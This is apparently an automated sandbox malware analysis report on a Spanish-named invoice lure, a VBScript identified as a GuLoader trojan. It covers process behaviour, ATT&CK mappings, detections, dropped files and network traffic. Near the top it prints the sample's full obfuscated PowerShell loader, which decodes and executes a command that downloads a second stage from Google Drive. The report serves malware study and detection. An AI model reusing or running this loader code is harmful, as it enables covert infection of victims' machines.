enatacharmtnepe aovers% udva\ mangmena.eimacuscunsugrdal.oo umisd cornabellict lsttafrivybop.eloverso tyrauautofshalst.calcea ingsanonprrcoevo eppyd&mi.da& s lv materebundfcb ligh pikioaften pitto$ joy. ';jardiniere (fjter 'nippe$knlesgsnus.lfodb,o,fskebpr,smadet,mlaccro:n nexfa korjgippoe juverappe,dtilplehystedhab,refagall dyresrikocnslaanokreoldpat,be.rederjivesn l goeindfr=fla,o(diarhcordrembodsvdgrav opgan/skamrcosten del $g.senncarraobent nflyflpfodsvatelegikr.dincarrotepicle as.ercoun,)famil ');jardiniere (fjter 'dekla$rvestgtals lc onkobirkebpassiaoverultopar: integfo.keawea.en co,ogdesi.rbeklaerecollunpej=scolo$,arnfe jetsxkat aepec,sn dkslcb.rnieha hop branhfaar.astetiloleodumodresmonod. gru.sme,kipsengel silki froctfolke( beha$ k asttousey hulepa.unchdittalstoflohjlp e puszm sugepvemodysp,ereaghasmplatyaridgi)dyste ');$exencephalus=$gangrel[0];jardiniere (fjter 'unita$udlsngetlarland,nounsa.bbr,mia ruinlrodte:concio ingevderuie multrr.debpcocknlin.bsu.adiomlingvpgener=infornhome,ehandlwpsych- daubo n.ckbf,ltpjdisabede.oncstatstepig, kenn s.rogry ho,ss udmnt excle.uperm ,oor.spaltn tri.e ,krit cuph.bal.nwtao,ieintoxbbeflacsubcaltrizoibalaneafdranafbagt bro, ');jardiniere (
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$kummelnweaving = 1;$bredders130='substrin';$bredders130+='g';function fjter($olericulturally){$kummelnterdivisional=$olericulturally.length-$kummelnweaving;for($kummel=5; $kummel -lt $kummelnterdivisional; $kummel+=(6)){$endocoele67+=$olericulturally.$bredders130.invoke($kummel, $kummelnweaving);}$endocoele67;}function jardiniere($overparticularity){. ($lflaskernes) ($overparticularity);}$heltalsdivisions=fjter 'betimmsourcoba,rizs,ouxibousol ove.lde sia m,du/erh.e5hrels.impla0 bal, .ran(.rstawpaafuisaltknintond nddoononrew udbosexplo prowlnpostet dig, ,mph1comor0 bes . xyl 0knokk;fugac ga.sewdeserieksplnteko 6eksem4 unap;vil,f ,iscoxindls6skder4,corz;no,ar p.pnsretiopv uopd: ch,f1str,g2 d.da1 cre .moron0aksel)baysv inkshgdermee cicecla sekana ho loin/ k,us2zec i0mortr1vigep0 para0delta1 misu0boble1puche peri.fdevasibogorrsk.dee flodf i,vioturboxce.tr/teuto1 he t2 ra,e1vulga.k.nne0 p.ls ';$maskinkoderne=fjter 'kry pusvar s kantebu.ikran ev-,ardiabehagghemanemolucncerebtrekyl ';$exencephalus=fjter ' s.rihpourpthaemut,mugip hepas annu:quill/cikad/bonded urobr edtsifinagvsvovlehyper.,ugtsg markojumbuotryghgudledl to.ae .tat. unnocom.alophlegmdisjo/codicuaasencr,neb?kursceboothx abdop .ealodotyerbi,iotquadr= jewed brimohydrowudplandornel saucosolilabombadommbl&turnuibalgedpolyp= luf.1 r dso i osfbrnephpsyc p unabnuhaanb benepakutilsttteuinterv syn,cmo.orfe.cashchicotttskrdfantaxfaareg ibrisgle.sutypeazu,vidn sidel ightmdevovd samds sammpforgavfri,ij.doli1afret3kir.nulicit0 shir ';$typhloempyema=fjter 'udlev>.erti ';$lflaskernes=fjter 'avlshibortfeun,rmx pio ';$nonpainter = fjter 'truele triecguldhhbuccaofo.si begiv% shadabiddaprum.opv,sitd enatacharmtnepe aovers% udva\ mangmena.eimacuscunsugrdal.oo umisd cornabellict lsttafrivybop.eloverso tyrauautofshalst.calcea ingsanonprrcoevo eppyd&mi.da& s lv materebundfcb ligh pikioaften pitto$ joy. ';jardiniere (fjter 'nippe$knlesgsnus.lfodb,o,fskebpr,smadet,mlaccro:n nexfa korjgippoe juverappe,dtilplehystedhab,refagall dyresrikocnslaanokreoldpat,be.rederjivesn l goeindfr=fla,o(diarhcordrembodsvdgrav opgan/skamrcosten del $g.senncarraobent nflyflpfodsvatelegikr.dincarrotepicle as.ercoun,)famil ');jardiniere (fjter 'dekla$rvestgtals lc onkobirkebpassiaoverultopar: integfo.keawea.en co,ogdesi.rbeklaerecollunpej=scolo$,arnfe jetsxkat aepec,sn dkslcb.rnieha hop branhfaar.astetiloleodumodresmonod. gru.sme,kipsengel silki froctfolke( beha$ k asttousey hulepa.unchdittalstoflohjlp e puszm sugepvemodysp,ereaghasmplatyaridgi)dyste ');$exencephalus=$gangrel[0];jardiniere (fjter 'unita$udlsngetlarland,nounsa.bbr,mia ruinlrodte:concio ingevderuie multrr.debpcocknlin.bsu.adiomlingvpgener=infornhome,ehandlwpsych- daubo n.ckbf,ltpjdisabede.oncstatstepig, kenn s.rogry ho,ss udmnt excle.uperm ,oor.spaltn tri.e ,krit cuph.bal.nwtao,ieintoxbbeflacsubcaltrizoibalaneafdranafbagt bro, ');jardiniere (Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information221
Scripting		Valid Accounts11
Command and Scripting Interpreter		221
Scripting		11
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Exploitation for Client Execution		1
DLL Side-Loading		1
DLL Side-Loading		21
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
PowerShell		Logon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
FACTURA24021151 - BP.vbs24%ReversingLabsScript-WScript.Trojan.Guloader
FACTURA24021151 - BP.vbs16%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
https://go.micro0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
drive.google.com
173.194.219.101
truefalse
    		high
    drive.usercontent.google.com
    		142.251.15.132
    		truefalse
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://www.google.compowershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2175250694.000002B83A805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://drive.usercontent.google.compowershell.exe, 00000002.00000002.2136160761.000002B82C43D000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmptrue
            • URL Reputation: malware
            • URL Reputation: malware
            		unknown
            https://drive.google.comPpowershell.exe, 00000002.00000002.2136160761.000002B82BF09000.00000004.00000800.00020000.00000000.sdmpfalse
              		unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://go.micropowershell.exe, 00000002.00000002.2136160761.000002B82B932000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                https://contoso.com/powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2175250694.000002B83A805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/Licensepowershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://drive.google.compowershell.exe, 00000002.00000002.2136160761.000002B82BF09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://drive.usercontent.google.compowershell.exe, 00000002.00000002.2136160761.000002B82AADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://drive.google.compowershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://aka.ms/pscore68powershell.exe, 00000002.00000002.2136160761.000002B82A651000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://apis.google.compowershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2136160761.000002B82A651000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                142.251.15.132
                                		drive.usercontent.google.comUnited States
                                		15169GOOGLEUSfalse
                                173.194.219.101
                                		drive.google.comUnited States
                                		15169GOOGLEUSfalse

                                General Information

                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1427938
                                Start date and time:2024-04-18 11:09:54 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 5m 6s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:7
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:FACTURA24021151 - BP.vbs
                                Detection:MAL
                                Classification:mal96.expl.evad.winVBS@6/6@2/2
                                EGA Information:Failed
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 5
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Found application associated with file extension: .vbs
                                • Stop behavior analysis, all processes terminated

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                • Excluded IPs from analysis (whitelisted): 23.40.205.34, 23.40.205.26, 23.40.205.18
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                • Execution Graph export aborted for target powershell.exe, PID 5960 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                11:10:41API Interceptor1x Sleep call for process: wscript.exe modified
                                11:10:44API Interceptor42x Sleep call for process: powershell.exe modified

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASNs

                                No context

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                3b5074b1b5d032e5620f69f9f700ff0eArrival Notice PUS_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                • 142.251.15.132
                                • 173.194.219.101
                                Transferencias SEPA.vbsGet hashmaliciousUnknownBrowse
                                • 142.251.15.132
                                • 173.194.219.101
                                shipping doc.vbsGet hashmaliciousGuLoaderBrowse
                                • 142.251.15.132
                                • 173.194.219.101
                                FACTURA 130424435.vbsGet hashmaliciousUnknownBrowse
                                • 142.251.15.132
                                • 173.194.219.101
                                justificant de transfer#U00e8ncia.vbsGet hashmaliciousUnknownBrowse
                                • 142.251.15.132
                                • 173.194.219.101
                                Justificante de pago.vbsGet hashmaliciousUnknownBrowse
                                • 142.251.15.132
                                • 173.194.219.101
                                Purchase Order PDF.exeGet hashmaliciousAgentTeslaBrowse
                                • 142.251.15.132
                                • 173.194.219.101
                                Leoch-Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                • 142.251.15.132
                                • 173.194.219.101
                                p silp AI240190.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                • 142.251.15.132
                                • 173.194.219.101
                                SecuriteInfo.com.Variant.MSILHeracles.77820.8707.3938.exeGet hashmaliciousUnknownBrowse
                                • 142.251.15.132
                                • 173.194.219.101

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                Download File
                                Process:C:\Windows\System32\wscript.exe
                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                Category:dropped
                                Size (bytes):69993
                                Entropy (8bit):7.99584879649948
                                Encrypted:true
                                SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                MD5:29F65BA8E88C063813CC50A4EA544E93
                                SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.

                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                Download File
                                Process:C:\Windows\System32\wscript.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):330
                                Entropy (8bit):3.136616309291395
                                Encrypted:false
                                SSDEEP:6:kKRgVlDN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:IlMkPlE99SNxAhUeVLVt
                                MD5:8FAFF9F9746F36958EAD4066BB602640
                                SHA1:CE226C8863DF5040F178F4AAED37F642EDFC5B97
                                SHA-256:D2B04749EE694652B74B74253C0359F6CCBD736F265F9CDF803E4DEF9CC3F748
                                SHA-512:8CC44B53AC7C5F96509DF3BA597CC3906022F096D1950A3D816420FB1B62306452ABED5CFFF8112F14EF1EA99682106BC49FDECDE1251A6975C722744AEF82AD
                                Malicious:false
                                Reputation:low
                                Preview:p...... ...........Ip...(....................................................... ........M.........(...........i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1940658735648508
                                Encrypted:false
                                SSDEEP:3:Nlllultnxj:NllU
                                MD5:F93358E626551B46E6ED5A0A9D29BD51
                                SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:@...e................................................@..........

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e325cqtp.nie.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkgsi2od.zzf.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Roaming\microdactylous.Aar

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:HTML document, ASCII text, with very long lines (1692), with no line terminators
                                Category:dropped
                                Size (bytes):1692
                                Entropy (8bit):5.107673373238809
                                Encrypted:false
                                SSDEEP:24:hazspjXlvhXlhEG0qnXXX08Ucq9J8mZoWHMzj+cB7jTsoT9FyVZ81wmna:7pj1mRq+fjsueFYaWJ
                                MD5:1A94DD44A29CFAB54C27D1284DA87916
                                SHA1:D14B41A5D17FBB3F8B0D4080369F1C4B9C43E665
                                SHA-256:CFC291F5127EF8531C3518740515984DA37D19A80E81165971F406CC11A4D46A
                                SHA-512:C8FC7035D3B438A9DB2FE11B91580D54589FE5D9F1F5B2CC9FFA6BEF105F0136379D44A33B707F6705A8BE11FEE0B46764BC1EC73B3F30A8D2837D3BA98BFB2A
                                Malicious:false
                                Reputation:low
                                Preview:<!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="QS7IZWgmLP4EspOrIh1CPw">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor:pointer}.goog-link-button-disabled{color:#ccc;text-decoration:none;cursor:default}body{color:#222;font:normal 13px/1.4 arial,sans-serif;margin:0}.grecaptcha-badge{visibility:hidden}.uc-main{padding-top:50px;text-align:center}#uc-dl-icon{display:inline-block;margin-top:16px;padding-right:1em;vertical-align:top}#uc-text{display:inline-block;max-width:68ex;text-align:left}.uc-error-caption,.uc-warning-caption{color:#222;font-size:16px}#uc-download-link{text-decoration:none}.uc-name-size a{color:#15c;text-decoration:none}.uc-name-size a:visited{color:#61c;text-decoration:none}.uc-name-size a:active{color:#d14836;text-decoration:none}.uc-footer{color:#777;font-size:11px;padding-bottom:5ex;padding-top:5ex;text-align:center}.uc-footer a{colo

                                Static File Info

                                General

                                File type:ASCII text, with CRLF line terminators
                                Entropy (8bit):5.256313401799237
                                TrID:
                                • Visual Basic Script (13500/0) 100.00%
                                File name:FACTURA24021151 - BP.vbs
                                File size:215'851 bytes
                                MD5:c782d407c65fb588872ca0d46bf40d75
                                SHA1:3618270c1dadde1fd9b0b9c9a93148317f814628
                                SHA256:83d1ada429755f86e1468a30957b910641d112d83f44390bcfa38d5c9210d244
                                SHA512:f14591b45890bcff8438779319d039efb613e1743b15d75108cfafd9d5f15a76eaa4db8e29e975cd9e5b3a5a6b322b052fb6c45a581b60992d0a389e015a32fe
                                SSDEEP:6144:AYBgIjQvrMbWSR4WHUJJs9E87Fy4lZrUChpqKmjum4QlNVrDjXR46cCPCRJf7Pqz:Z2dObjan
                                TLSH:352418F0CF0B36199F5B3EDAAC6445928AF44195011638B5AAD817EDB283D2CE3FDD18
                                File Content Preview:..'Lollup kystvagt? newscasters195: wirrah: premade..'fernbrake; overdominating dures forsgsordnings?..'Rashnesses; ulykkesfuglene depositive stimulansers72..'Makroerne bidery? typewrote..'Jagtbderne nonleprous..'Dateringsforsgets128, maries:.. ..'Tordenb

                                File Icon

                                Icon Hash:68d69b8f86ab9a86

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Apr 18, 2024 11:10:46.080589056 CEST49706443192.168.2.5173.194.219.101
                                Apr 18, 2024 11:10:46.080630064 CEST44349706173.194.219.101192.168.2.5
                                Apr 18, 2024 11:10:46.080718040 CEST49706443192.168.2.5173.194.219.101
                                Apr 18, 2024 11:10:46.090661049 CEST49706443192.168.2.5173.194.219.101
                                Apr 18, 2024 11:10:46.090676069 CEST44349706173.194.219.101192.168.2.5
                                Apr 18, 2024 11:10:46.309928894 CEST44349706173.194.219.101192.168.2.5
                                Apr 18, 2024 11:10:46.310015917 CEST49706443192.168.2.5173.194.219.101
                                Apr 18, 2024 11:10:46.310992956 CEST44349706173.194.219.101192.168.2.5
                                Apr 18, 2024 11:10:46.311156988 CEST49706443192.168.2.5173.194.219.101
                                Apr 18, 2024 11:10:46.315443039 CEST49706443192.168.2.5173.194.219.101
                                Apr 18, 2024 11:10:46.315454006 CEST44349706173.194.219.101192.168.2.5
                                Apr 18, 2024 11:10:46.315696001 CEST44349706173.194.219.101192.168.2.5
                                Apr 18, 2024 11:10:46.326457024 CEST49706443192.168.2.5173.194.219.101
                                Apr 18, 2024 11:10:46.372111082 CEST44349706173.194.219.101192.168.2.5
                                Apr 18, 2024 11:10:46.538961887 CEST44349706173.194.219.101192.168.2.5
                                Apr 18, 2024 11:10:46.539036036 CEST44349706173.194.219.101192.168.2.5
